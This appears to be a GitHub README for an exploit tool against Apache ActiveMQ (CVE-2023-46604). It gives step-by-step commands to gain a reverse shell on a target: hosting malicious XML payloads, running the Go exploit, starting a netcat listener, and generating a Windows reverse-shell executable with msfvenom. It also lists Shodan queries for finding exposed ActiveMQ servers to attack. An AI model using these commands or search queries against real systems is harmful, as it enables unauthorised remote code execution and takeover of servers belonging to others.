/CVE-2023-46604

Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)

Primary LanguageGo

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

This exploit builds upon the foundational work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (https://github.com/rapid7/metasploit-framework).

Usage:

Important: Manually change the IP Address (0.0.0.0 on line 11) in the XML files with the IP Address where the payload will be generated. If u follow the below commands it will be your Listner IP Addess. Also {IP_Of_Hosted_XML_File} will be your Listner IP Address.

For Linux/Unix Targets (Note removed binary from repo. Will run using go)

  • Spawn python webserver before running on port of your choosing
  • Spawn a netcat listerner on port 9001 before running
go run main.go -i <Target> -p 61616 -u http://<lhost>:<port>/poc-linux.xml

For Windows Targets

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

image

Shodan Dork:

  • product:"ActiveMQ OpenWire Transport"
  • image
  • product:"ActiveMQ OpenWire Transport" port:61616
  • image

Original Work:

For More Reading:

A special thanks to https://github.com/Anon4mous for actively supporting me.